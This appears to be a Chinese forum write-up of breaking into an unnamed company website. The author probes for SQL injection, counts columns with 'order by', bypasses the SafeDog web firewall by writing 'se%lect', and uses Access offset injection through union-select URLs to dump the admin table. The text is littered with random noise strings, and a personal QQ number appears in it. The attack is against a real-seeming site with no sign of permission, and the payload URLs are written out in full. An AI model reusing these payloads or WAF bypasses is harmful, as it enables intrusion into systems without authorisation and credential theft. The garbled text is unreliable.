打开网站,一个企业站。
' e. [' J+ ~" x6 ^3 q5 o9 u! \/ o" X6 D
5 l- Q, f) d+ t+ b$ O0 F+ H
. e8 G1 a/ c3 { n/ P7 l顺手加个admin" x( t8 A. I7 z# n5 N* w
+ H. s3 `" u$ B8 J. j& c
1 p2 o% ~' n3 A, u& u4 {默认后台。
) A: n) Q6 x7 D' Y$ S! `* ]. x* _回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
) b% ~! w7 b; o
! O6 Z1 u7 p" j- I
$ r, Y/ W, ^ G5 P! d3 X1 u: y; e
7 T# r0 ^+ q' H1 p所以就不用御剑扫了,待会直接封IP。
6 e Y) Q" f) k; Z# ~. y9 l5 S$ i
* g( n \) a6 I; o3 H% i0 S& L用order by语句判断是否存在注入。
8 Q9 y* h- G6 B$ d' ]: Nhttp://www.xxx.com /product_show.asp?id=997 order by 18 s& M4 ~: h6 m
http://www.xxx.com /product_show.asp?id=997 order by 100
2 F2 ^2 O- N; r C/ M, S( ?现在存在注入,经测试后发现是9个字段。
$ o3 w4 i& L" m: F1 [, u $ K* X' f& |# @, G9 E
接下来进行联合查询,猜是否存在admin表。; C( W' w& N1 }
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。4 ]3 O. \ X& ^* G$ p5 {6 C
8 _1 ?! q9 J* X4 K- ~" m2 b0 r
0 k# G/ P. X+ B3 L; g7 y h1 b# _( C9 o, G# I; r {( }9 l
在select中间加个%,se%lect绕过安全狗。
6 z+ [! A- ?1 V$ W5 |: R
7 g' \- f8 ]' z2 v* Q* j$ h( u W# @
发现存在admin表,然后开始手工猜常用的字段。
* Z8 H. a) N# ]! V* Y/ a纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
, }5 |1 G6 T" S1 ~8 z4 n% L0 M2 Z
5 t) g5 X1 l& J; Z: p7 s突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。8 f/ k' K8 m4 F* G* h9 i& Z' J8 t
% W$ g2 g2 f3 [科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。( D# l- f2 p! X' }) L/ n Z
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
+ B3 ?2 T6 m2 ]好了,敏感内容出显了。2 R. n; ^2 ]9 m/ Y+ O
6 X0 K! y% p1 Z2 i1 A7 `
8 g5 M% Y$ Y* |8 L8 o# {6 X& p3 A) U" u" R4 V. x2 o6 w* M
|